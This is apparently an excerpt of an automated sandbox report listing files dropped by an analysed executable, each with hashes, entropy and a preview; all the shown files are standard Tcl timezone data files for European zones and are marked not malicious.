                                                                                                                                                                                                                              MD5:52C36955D6BD1D9FE9CB64822D04B6DB
                                                                                                                                                                                                                              SHA1:D5FF82EC486409E6FB314AD5ACE608577C9632CF
                                                                                                                                                                                                                              SHA-256:B87630FF459DE07EB16CD0C2452660772E3FFC4EEB8419EA77A013B6F63A5900
                                                                                                                                                                                                                              SHA-512:ABA49D3F05A41A4982600E4DA5C225D8994251F447401EE6FE8478E008BCD5D41C057034185B5CFF805634D571F3CC98EFE98093ABC8E6271351E11A4DA1E7AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8038
                                                                                                                                                                                                                              Entropy (8bit):3.8240363895915914
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kr9+neXAS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlh:KnASs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:828134FA1263FEFA2B06A8B2F075F564
                                                                                                                                                                                                                              SHA1:4B332DE6E0855F8B9517F7098A3FB439671FC349
                                                                                                                                                                                                                              SHA-256:5D3AFED5C1B07C6C6635D6BDEB28A0FB4D11A61F25F26C91227B2254BE5F4AA0
                                                                                                                                                                                                                              SHA-512:9AB1462CDBD7F13F0CECDCCC2D91A85D8C0576B71508F935D26638C25ED023CF8FF4BA4FFDA402B308E6142B135D1B9D88700A519DBE2381E8E945329A5354F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Prague) {.. {-9223372036854775808 3464 0 LMT}.. {-3786829064 3464 0 PMT}.. {-2469401864 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-777862800 7200 0 CEST}.. {-765327600 3600 0 CET}.. {-746578800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-728517600 0 1 GMT}.. {-721260000 0 0 CET}.. {-716425200 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654217200 7200 1 CEST}.. {-639010800 3600 0 CET}.. {283993200 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7658
                                                                                                                                                                                                                              Entropy (8bit):3.7750218768791806
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eq+cEpkjXkSV385aNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:ePWjUS7ivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:0D3C919F60081388524BD5DB22E6904B
                                                                                                                                                                                                                              SHA1:6691EAB901C8B57D2F2693120A45A67799D05FCB
                                                                                                                                                                                                                              SHA-256:8B64A42BAFD90F9255CACFDBAC603D638DD7C18DC27249F9C9B515E1DA634424
                                                                                                                                                                                                                              SHA-512:62A2820B8C1C5468AC1F1BB626F9AAAD0BA1DEC5B73740F00FE4DB8CFA3F2BCF9947968E693824FC8770BA20AB962F93F7E5E345AE8A85F99CDB18E2B510308E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Riga) {.. {-9223372036854775808 5794 0 LMT}.. {-2840146594 5794 0 RMT}.. {-1632008194 9394 1 LST}.. {-1618702594 5794 0 RMT}.. {-1601681794 9394 1 LST}.. {-1597275394 5794 0 RMT}.. {-1377308194 7200 0 EET}.. {-928029600 10800 0 MSK}.. {-899521200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-795834000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {6
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8813
                                                                                                                                                                                                                              Entropy (8bit):3.8168470239811736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:hhGvC2GmkNXEq74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhn:hUsF41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:C4F49446D3696301EDB339691DCB2FDB
                                                                                                                                                                                                                              SHA1:537963A77B9BE9BE6B997A812A6E6DD120F6F247
                                                                                                                                                                                                                              SHA-256:DCD2D9144507311E573568598E1FFD0E0574FB677AA0DAFC5641D80A19EB6E58
                                                                                                                                                                                                                              SHA-512:1F0A9A549FA0995C51E90AC392671E3F09744B268F1EE6A27CA7E3C41C2B02A4BA0F98369BE40BA482FBA1FED8F1EE712F0B3217AD86164D1AD498E369C24D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Rome) {.. {-9223372036854775808 2996 0 LMT}.. {-3252098996 2996 0 RMT}.. {-2403565200 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-830307600 7200 0 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-807152400 7200 0 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 36
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2118
                                                                                                                                                                                                                              Entropy (8bit):3.664269700453612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7PvCAs6kKR6aQmF1cSNWrI+AjQnTRYZ/YF0LUdt/LkajuZbIJltiabs2Tb:7HCAs6kC6aZF1cSN4I+AjQTRYZ/YF0Lw
                                                                                                                                                                                                                              MD5:965D987F6576F66A08871697144D4CDB
                                                                                                                                                                                                                              SHA1:AF7226DF81C2B3C3A5832F59FC708A6BCBF389CA
                                                                                                                                                                                                                              SHA-256:8F395352AA05D35E7D13380E73659A0D5B56FFC17E3F4E40E4F678A902F0E49B
                                                                                                                                                                                                                              SHA-512:B82E0CFA5EDA0FCDF03609AE439255F8937A7E9EFA0AFE15EA8877316782AFC74514BCD2B4F06F1B5F0F3C5A64A933D73CB50D5AED2BB1491BD6CACBB77B10E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Samara) {.. {-9223372036854775808 12020 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-1102305600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 10800 0 +03}.. {687916800 14400 0 +04}.. {701820000 18000 1 +05}.. {717544800 14400 0 +04}.. {733
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.955758257767983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQawELDX7x/yQaxE:SlSWB9vsM3ymx5PHAIgoxvN/yt/yrE
                                                                                                                                                                                                                              MD5:D253DA6880630A31D39DB0CFA4933ABD
                                                                                                                                                                                                                              SHA1:E5798DAAE574729685FE489F296B964BC1CCF2E4
                                                                                                                                                                                                                              SHA-256:B6856A0E38C2404F7D5FA1821559503F8AE70923A562F0D993124D131515F395
                                                                                                                                                                                                                              SHA-512:CFB6005F3E8D1C585AF36EB7A8C9F49760EF6F446C97E7804EB61EFD0804424C4FB6AE81B71C5A867274EF89A17DAC0D2A0FF882A0F6AEA1D5FFD51593726C5F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/San_Marino) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.937834327554967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawEX3GEaQa5:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNZ
                                                                                                                                                                                                                              MD5:F7C7DAE9C5D371EF9EE1F490246ED3CC
                                                                                                                                                                                                                              SHA1:40C388FE2A55078C8E0524A4385B3F8846960E24
                                                                                                                                                                                                                              SHA-256:BC00D953C2F3E55E40EDA13838AB66B9E9D0BDAD620E4EB917637761ABB06FB1
                                                                                                                                                                                                                              SHA-512:EB22C59F4D58D96797A718FC59B010795F587626E456D44A3E6398E0FBF4ECD97BCDC151BC1359151798B5AF2964FE5708233F8ECD0D344C3E27629F2645687F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Sarajevo) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2061
                                                                                                                                                                                                                              Entropy (8bit):3.6638125261109824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:yFvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDQ:yhCAs6kC6aZF1cSNcjXgV/ApDFjDQ
                                                                                                                                                                                                                              MD5:CC4D7C478790588D232568CAB12D8E67
                                                                                                                                                                                                                              SHA1:07A7CFCFFFF91D124EDFC99F5053BAFC79FBB12B
                                                                                                                                                                                                                              SHA-256:AB90363DEE5077C39EC55FE8E519593FF08223E5A8E593F6CCE01FB5B8B35BAE
                                                                                                                                                                                                                              SHA-512:23944D20624C942CFDE58F1019160D64401BD0AFB8C3EC49F904038482FAA6741812548C860A2DAE050B8D17A7E08ED9C6EBE7FF19393CFA46D78B1D21B1CACA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Saratov) {.. {-9223372036854775808 11058 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {780
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2389
                                                                                                                                                                                                                              Entropy (8bit):3.9491446081772748
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:wM2wE0xhuHJkYaVV0XOnbdSisa0ewEKGfUslIYtq8X:UwEAEpkzVFgaNl7
                                                                                                                                                                                                                              MD5:03E05E60E064198BF6562B2E6E8DA8D2
                                                                                                                                                                                                                              SHA1:51461207B671536CD4A7587BA283DE2D0017AA4A
                                                                                                                                                                                                                              SHA-256:D51CD3DE50C50BCA1624EFC952ADD15D418A09EC213760DF5BC3097E35C5A7A0
                                                                                                                                                                                                                              SHA-512:73B7773DABE19F20DD211E178B822FD35620DC4AC8B9D20259971B1157ED7A60A5A41026258FAA8B15016268D241ED804AC1307CACDA00D6FE657407D254B02C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Simferopol) {.. {-9223372036854775808 8184 0 LMT}.. {-2840148984 8160 0 SMT}.. {-1441160160 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-888894000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-811645200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {646786800 7200 0 EET}.. {701042400 7200 0 EET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.953089768975736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawOgpr8Qahr:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNO
                                                                                                                                                                                                                              MD5:0BF8ADBB63F5D6187C75FF1B0BAC761E
                                                                                                                                                                                                                              SHA1:7DE15E767D34812F784CE6E85438A592E2CBA418
                                                                                                                                                                                                                              SHA-256:52F20858433261B15797B64F0A09CEE95D552EF93B5DAA7C141BFAB6D718C345
                                                                                                                                                                                                                              SHA-512:27D395635427C8FA1A4E0063A32F482701D2CC7C7724B4A06E661D4A419D23E219672888D37367FE5E70B6872914EB9EE034AE359DCB6A4C4CE05CA34C3589A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7654
                                                                                                                                                                                                                              Entropy (8bit):3.727428614069594
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:8lmG4+K7Gjz5CXNUatpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:8lmGWwkdUasivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:91357DFC23ADB0CE80C463E4B6D896BE
                                                                                                                                                                                                                              SHA1:273F51BE4C67A9AC1182F86AC060E963684151D5
                                                                                                                                                                                                                              SHA-256:6415F279CB143EA598CF8272263AC5B502827B10CEEB242B39E6EFCC23A2EE12
                                                                                                                                                                                                                              SHA-512:8EA7E2D4C2239879A4D6CCE302C38A6D2A9093A2CADEF4F4294E60D373AB9A2C468BA6E3D54DEC7F73D954CE5226EF2B022F8BDEF29B3B4AAB3838B05C72EA29
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Sofia) {.. {-9223372036854775808 5596 0 LMT}.. {-2840146396 7016 0 IMT}.. {-2369527016 7200 0 EET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-781048800 7200 0 EET}.. {291762000 10800 0 EEST}.. {307576800 7200 0 EET}.. {323816400 10800 1 EEST}.. {339026400 7200 0 EET}.. {355266000 10800 1 EEST}.. {370393200 7200 0 EET}.. {386715600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465350400 7200 0 EET}.. {481075200 10800 1 EEST}.. {496800000 7200 0 EET}.. {512524800 10800 1 EEST}.. {528249600 7200 0 EET}.. {543974400 10800 1 EEST}.. {559699200 7200 0 EET}.. {575424000 10800 1 EEST}.. {591148800 7200 0 EET}.. {606873600 10800 1 EEST}.. {62259
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.956798438511978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQawRMNSTyQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yqMNSTm
                                                                                                                                                                                                                              MD5:ACFB8E2D1D4BA0D2D46410F2F2823B21
                                                                                                                                                                                                                              SHA1:4AC3A19E94DE606DFF7D93BC6C7F113F3D2D083A
                                                                                                                                                                                                                              SHA-256:64615AEA9EF14A2609D2C804901281C83FDDC0A8BCA9B377D6CAD62D81801C66
                                                                                                                                                                                                                              SHA-512:2E23AC0DE7D3D0CF2BA4FE3EE31E15EB614A7442097578209D38CE2FF2E3DF006881463866FE67DD4DDEAB179E5CD2946E8A9E8F7401F1B953E9AB216EC753F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Stockholm) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7549
                                                                                                                                                                                                                              Entropy (8bit):3.76585669030767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dUusEpkjXkSV3AMaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:O0WjUSWivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:54EF0224F5E28FA78F212EC97D4AE561
                                                                                                                                                                                                                              SHA1:FA7C9A951ED943F1E1E609D2253582016BC26B57
                                                                                                                                                                                                                              SHA-256:6F3594CCDA78B02B2EE14C8FAE29E668E47193AF2DFCF5AF1ECD210F13BCE9CE
                                                                                                                                                                                                                              SHA-512:2D1CA2BB1945AE5E3F56AF8FA7F950CE7169F215C783E683634581C5EC01B54159E47A0E9551897077BBEAB06158906029A4E4B0051A263D9E5D903EA9DA1692
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tallinn) {.. {-9223372036854775808 5940 0 LMT}.. {-2840146740 5940 0 TMT}.. {-1638322740 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1593824400 5940 0 TMT}.. {-1535938740 7200 0 EET}.. {-927943200 10800 0 MSK}.. {-892954800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-797648400 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7675
                                                                                                                                                                                                                              Entropy (8bit):3.809498345470167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:n05NWKIHBJ9AE4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt:0iKqxAE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:1983B88075A92942209BB2B80E565F4E
                                                                                                                                                                                                                              SHA1:12A0401026C5C036144FD1D544173AAB39969F61
                                                                                                                                                                                                                              SHA-256:C62686BF598138FEFB72E8CC6632BA75A5FE147F2A30124EE3583BE1F732E38D
                                                                                                                                                                                                                              SHA-512:E95C38FA0A2B526C00B9DCF5CDF53059DECF64B085AA18BE000968DA626561944415D053CF7A5C32BC672085538920CFD67A3A3B627CFD5B1A4C9CEC49AA3F96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tirane) {.. {-9223372036854775808 4760 0 LMT}.. {-1767230360 3600 0 CET}.. {-932346000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-843519600 3600 0 CET}.. {136854000 7200 1 CEST}.. {149896800 3600 0 CET}.. {168130800 7200 1 CEST}.. {181432800 3600 0 CET}.. {199839600 7200 1 CEST}.. {213141600 3600 0 CET}.. {231894000 7200 1 CEST}.. {244591200 3600 0 CET}.. {263257200 7200 1 CEST}.. {276040800 3600 0 CET}.. {294706800 7200 1 CEST}.. {307490400 3600 0 CET}.. {326156400 7200 1 CEST}.. {339458400 3600 0 CET}.. {357087600 7200 1 CEST}.. {370389600 3600 0 CET}.. {389142000 7200 1 CEST}.. {402444000 3600 0 CET}.. {419468400 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {457480800 7200 0 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.906212162381389
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV+NM/LWXHAIgoq9NM/HARL/yQa3MPgJM1p8QagNMj:SlSWB9vsM3ymI6CHAIgoI6HAN/ytM4MO
                                                                                                                                                                                                                              MD5:E0C99DB7673EEE440BA1848046455BA1
                                                                                                                                                                                                                              SHA1:1BCCC1BE46306DEF8A9CA249DE8FA11FC57CC04D
                                                                                                                                                                                                                              SHA-256:FDD53FDB5F754BBBA8FF98F0B1555FE0BAEB7852843220A7CF93A190B641A9AD
                                                                                                                                                                                                                              SHA-512:CD56B540AE9084DEAA9D0A1DBBAF89733C465424C22CE74696B9AE90FD4FEFAB265CF23C5B13A7F04597D75FD0147BD593E0552B56D87372170CB4CA1BFC8259
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Chisinau)]} {.. LoadTimeZoneFile Europe/Chisinau..}..set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2119
                                                                                                                                                                                                                              Entropy (8bit):3.680951255407528
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kFvCAs6kKR6aQmF1cSNWrI+AjQndgV/Ap40FjDOP:khCAs6kC6aZF1cSN4I+AjQdgV/ApDFj4
                                                                                                                                                                                                                              MD5:83C86E437B5FBA1DC9CC5235396AC381
